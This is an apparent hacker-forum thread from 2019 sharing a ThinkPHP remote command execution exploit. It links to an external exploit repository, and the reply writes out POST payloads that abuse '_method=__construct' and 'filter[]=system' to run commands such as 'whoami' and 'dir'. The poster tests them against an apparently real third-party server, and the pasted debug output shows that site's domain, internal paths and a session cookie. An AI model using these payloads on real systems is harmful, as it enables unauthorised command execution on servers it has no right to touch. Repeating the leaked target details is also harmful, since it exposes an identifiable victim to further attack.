设为首页收藏本站
查看: 24904|回复: 1

继上次之后,又一个热乎乎的ThinkPHP命令执行

[复制链接]
  • TA的每日心情
    奋斗
    2019-12-4 09:30
  • 签到天数: 105 天

    [LV.6]常住居民II

    发表于 2019-1-11 17:32:00 | 显示全部楼层 |阅读模式
    本帖最后由 指尖轻流过 于 2019-1-12 14:02 编辑

    编辑界面附件啊,图片有问题,所以放在了码云上。
    exp的交流在评论区。三克油。

    # ppp:https://gitee.com/oldstar/share/tree/master/%E6%BC%8F%E6%B4%9E%E5%88%86%E4%BA%AB/php
    # QQQ : 二楼继续。(有一些问题,最终EXP还没搞定)
  • TA的每日心情
    奋斗
    2019-12-4 09:30
  • 签到天数: 105 天

    [LV.6]常住居民II

     楼主| 发表于 2019-1-11 17:37:32 | 显示全部楼层
    本帖最后由 指尖轻流过 于 2019-1-11 17:48 编辑

    1、这个我测试了一下,可能有一些问题。比如发一个请求包:
    http://api1.xxxx.cn/public/index.php      [data : s=whoami&_method=__construct&method=&filter[]=system]
    可能会出现这个,并不是直接带回显:
    system() has been disabled for security reasons

    Environment Variables
    GET Dataempty
    POST Data
    s whoami
    _method __construct
    method
    filter [ "system" ]
    Filesempty
    Cookies
    PHPSESSID gq3g5licnu0cots6tn2dhvkb97
    Sessionempty
    Server/Request Data
    _FCGI_X_PIPE_ \\.\pipe\IISFCGI-1013591a-faa8-4739-bfc4-64bd59aca88e
    PHP_FCGI_MAX_REQUESTS 10000
    ALLUSERSPROFILE C:\ProgramData
    APPDATA C:\Windows\system32\config\systemprofile\AppData\Roaming
    APP_POOL_CONFIG C:\inetpub\temp\apppools\ipa.shsinvy.cn\ipa.shsinvy.cn.config

    2、发第二个包:
    http://api1.XXXX.cn/public/index.php?s=captcha      data : _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=dir

    模块不存在:captcha
                    $config = self::init($module);

                    // 模块请求缓存检查
                    $request->cache(
                        $config['request_cache'],
                        $config['request_cache_expire'],
                        $config['request_cache_except']
                    );
                } else {
                    throw new HttpException(404, 'module not exists:' . $module);
                }
            } else {
                // 单一模块部署
                $module = '';
                $request->module($module);
            }

            // 设置默认过滤机制
            $request->filter($config['default_filter']);
    Call Stack
    in App.php line 535
    at App::module(['captcha', null, null], ['app_host' => '', 'app_debug' => true, 'app_trace' => false, ...], null) in App.php line 457
    at App::exec(['type' => 'module', 'module' => ['captcha', null, null]], ['app_host' => '', 'app_debug' => true, 'app_trace' => false, ...]) in App.php line 139
    at App::run() in start.php line 19
    at require('D:\wwwroot\ipa.shsin...') in index.php line 17

    Environment Variables
    GET Dataempty
    POST Data
    _method __construct
    filter [ "system" ]
    method get
    server { "REQUEST_METHOD": "dir" }
    Filesempty
    Cookies
    PHPSESSID gq3g5licnu0cots6tn2dhvkb97
    Sessionempty
    Server/Request Data
    _FCGI_X_PIPE_ \\.\pipe\IISFCGI-9ddde0da-715f-449f-b5fd-4025782db7d0
    PHP_FCGI_MAX_REQUESTS 10000
    ALLUSERSPROFILE C:\ProgramData
    APPDATA C:\Windows\system32\config\systemprofile\AppData\Roaming
    APP_POOL_CONFIG C:\inetpub\temp\apppools\ipa.shsinvy.cn\ipa.shsinvy.cn.config
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    关闭

    站长推荐 上一条 /1 下一条

    红盟社区--中国红客联盟 

    Processed in 0.094378 second(s), 13 queries.

    站点统计| 举报| Archiver| 手机版| 黑屋 |   

    Powered by HUC © 2001-2017 Comsenz Inc.

    手机扫我进入移动触屏客户端

    关注我们可获取更多热点资讯

    Honor accompaniments. theme macfee

    快速回复 返回顶部 返回列表